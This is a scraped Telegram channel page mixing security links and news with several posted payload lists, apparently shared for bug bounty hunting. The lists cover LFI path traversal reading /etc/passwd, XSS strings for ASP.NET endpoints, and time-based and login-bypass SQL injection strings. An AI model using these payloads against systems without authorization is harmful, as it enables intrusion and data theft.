Source Byte
Ir al canal en Telegram
هشیار کسی باید کز عشق بپرهیزد وین طبع که من دارم با عقل نیامیزد Saadi Shirazi 187
Mostrar más7 825
Suscriptores
-524 horas
-257 días
+9930 días
Archivo de publicaciones
7 826
Converting LFI into RCE by chaining PHP encoding filters
https://www.synacktiv.com/publications/php-filters-chain-what-is-it-and-how-to-use-it.html
7 826
$10,000 From GitHub For Bypassing Filtration oF HTML tags
https://infosecwriteups.com/how-i-got-10-000-from-github-for-bypassing-filtration-of-html-tags-db31173c8b37
7 826
Some filter bypass payload list while hunting for LFi vulnerability
→index.php?page=....//....//etc/passwd
→index.php?page=..///////..////..//////etc/passwd
→index.php?page=/var/www/../../etc/passwd
→index.php?page=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd
7 826
Awesome-Bugbounty-Writeups
https://github.com/devanshbatham/Awesome-Bugbounty-Writeups
7 826
XSS payloads for http://ASP.NET endpoints:
/(A('onerror=%22alert%601%60%22testabcd))/
/Orders/(A(%22onerror='alert%60xss%60'testabcd))/Login.aspx?ReturnUrl=/Orders
(A(%22onerror='alert%601%60'testabcd))/Login.aspx?ReturnUrl=%2f
For more ➡️ http://blog.isec.pl/all-is-xss-that-comes-to-the-net/
7 826
Add to your list SQL injection payload 🥶
1%27//%256fR//50%2521%253D22%253B%2523
==
"0\"XOR(if(now()=sysdate(),sleep(9),0))XOR\"Z",
===
query=login&username=rrr';SELECT PG_SLEEP(5)--&password=rr&submit=Login
==
' AND (SELECT 8871 FROM (SELECT(SLEEP(5)))uZxz)
7 826
Repost from مگاهرتز :: روزنامهنویس
حباب اطلاعاتی چیست؟
چگونه میتوان از آن خارج شد؟
منبع: dw_persian
7 826
The source code of Intel Alder Lake processors has appeared on the web.
Intel has confirmed that some of the source code and internal documentation for Alder Lake has been leaked and clarified that the data from this leak, which has been published in public sources, is genuine.
7 826
سیم سوآپ یا سیم کارت هایجکینگ چیست؟
https://youtu.be/DGJqmKfRulU
داوود سجادی دکترای علم کامپیوتر ✍
7 826
JSON Crack is a tool that generates graph diagrams from JSON objects
https://github.com/AykutSarac/jsoncrack.com
7 826
param=' or 1=1#
param=' or 1=1
param=' or 1=1 //
param= or 1=1#
param=and or 1=1#
param=' or 1=1
This is the most classic, standard first test:
' or '1'='1
Then you have:
-'
' '
'&'
'^'
'*'
' or ''-'
' or '' '
Part 2 🥶
7 826
Login Bypass 🌵
#SQLi
param='
param="
param=' or 1=1
param=' or 1=0
param=' and 1=1
' or sleep(2) and 1=1#
' or sleep(2)#
admin' and sleep(2)#
' union select sleep(2),null#
' union select sleep(2),null,null,null,null#
Part 1🥶
7 826
یک متخصص #اوسینت یا کارگاه وب وقتی به یک عکس یا ویدئو برخورد می کند برای رسیدن به سر نخ ها این موارد را بررسی می کند:
Original Photo taken from Camera?
is copyrighted?
Has authoring Information?
Contains comments / descriptions?
Contains tracking?
Contains faces?
Contains text?
Contains location detalls?
Contains steganography?
Contains digital watermarks?
Contains date/time details?
Has maker note content?
Contains camera device Information?
Has thumbnail(s)?
Contains unreadable metadata?
Traling data appended to photo?
Contains metadata?
¡Ya disponible! Investigación de Telegram 2025 — los principales insights del año 
